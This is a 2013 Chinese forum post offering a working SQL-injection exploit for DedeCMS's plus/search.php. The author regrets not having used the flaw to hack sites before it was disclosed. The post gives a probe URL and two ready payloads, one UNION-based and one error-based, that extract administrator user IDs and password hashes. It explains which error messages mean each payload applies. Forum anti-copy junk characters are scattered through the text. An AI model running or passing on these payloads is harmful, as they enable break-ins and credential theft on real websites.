找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2062|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
转载不加作者名的没JJ5 D4 ~6 E+ j! F; |
8 ^3 R6 K! S1 ~! g
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。2 i: J1 Q0 U& d3 b( }9 f9 r" S

, X+ ~* B  \: ^4 d; {1 Q$ U: ~, K既然已经发出来了,我就把我自己搞的exp发下吧。。唉。, x! @3 |* |5 a7 v

# {) w8 k0 t* [, d( C) \我一般是这样测试的:
: y0 |" L8 m' x9 g( a7 l  g( Z
% `( E# c) v) @7 h1 f. z, A* J提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
9 U3 r  T# p' z! g; N9 }) |, H; Q* U% N+ M' ~
转载不加作者名的没JJ) q* Q# N0 D8 F* |* U9 H
+ b; N; G* d2 H
作者:鬼哥. H* |$ q# W& ]7 u
5 C- X5 E" _" B6 g( r% H
( G# |% h1 L/ B( q( O
! A1 N# C  p2 S
看结果如果提示* H. v! C# o6 Y: Q2 B  B, l2 H

  x% t; ^2 P. y+ HSafe Alert: Request Error step 2 !
5 W& ^7 S7 b  F2 H* ?
1 K( i5 T3 d2 g那么直接用下面的exp9 U$ x' f) T$ b# G" F6 b
. }" T3 ~* I! R
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a# Y- F& l* f9 U  T( N: d
; ^$ t3 v" u6 |1 V2 m9 b$ g
/ Y* W; n, _$ ~5 j0 _5 e
看结果如果提示) W$ l  e* X! Q* S2 S
% B5 g* j! k, m: [" r" a
Safe Alert: Request Error step 1 !  T% a! @  ~( b8 {/ s$ Q

( Z1 j/ B/ a& w9 t那么直接用下面的exp
$ o, J: _8 i; M, u
% E9 u+ A  F, t( Q" U4 K! ]& ^xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a4 u; v5 S) [7 `7 J- ]0 x2 q
' f" S; V7 o) W: ]+ _

7 Z' e2 J% G2 A2 W  g如果正常显示证明漏洞不存在了。+ t5 E1 O! |4 m: K

* y) K6 o& h+ ~4 F5 H3 Z8 V& w; q3 I转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表